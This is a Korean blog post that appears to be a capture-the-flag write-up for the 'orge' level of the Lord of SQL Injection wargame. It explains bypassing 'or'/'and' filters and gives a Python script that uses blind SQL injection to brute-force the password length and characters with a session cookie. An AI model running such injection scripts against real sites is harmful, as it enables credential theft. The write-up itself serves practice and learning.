728x90
ㅎㅇ
or와 and 필터링을 우회해서 비밀번호를 알아내자
하나하나 하기가 귀찮아서 파이썬 Brute force코드를 짜보았다.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 | import requests URL = 'https://los.eagle-jump.org/orge_40d2b61f694f72448be9c97d1cea2480.php' head = {'cookie' : 'PHPSESSID=gcraruf8evku7kbdhoq9vqo986; _cfduid=de63e93b1fee3ab4d7fa46e679599d9381503410506'} def answer(num): for a in range(1,num+1): for b in range(48,128): params_b = {'pw' : "'|| 1=1 && ascii(substr(pw,"+str(a)+",1)) = '"+str(b) } res_b = requests.get(url=URL, params=params_b, headers=head) if("Hello admin" in res_b.text): print(chr(b)) break for i in range(5,15): params = {'pw' : "' || 1=1 && length(pw)='"+str(i)} res = requests.get(url=URL, params=params, headers=head) if ("Hello admin" in res.text): print(i) answer(i) break | cs |
파이썬 코드를 이용해서 and 필터링을 우회할때 %26을 이용하였더니 계속 안되었다..
이것 때문에 계속 안됬다..
이제 잘 알아 둬야겠다
첫번째는 자릿수 그 뒤에는 비번
입력하면
깔끔하게 해결!
반응형
'C. 웹 > 실습' 카테고리의 다른 글
| [LOS] 9번 vampire (0) | 2017.08.25 |
|---|---|
| [LOS] 8번 troll (0) | 2017.08.25 |
| [LOS] 6번 darkelf (0) | 2017.08.25 |
| [LOS] 5번 wolfman (0) | 2017.08.03 |
| [LOS] 4번 orc (0) | 2017.08.03 |
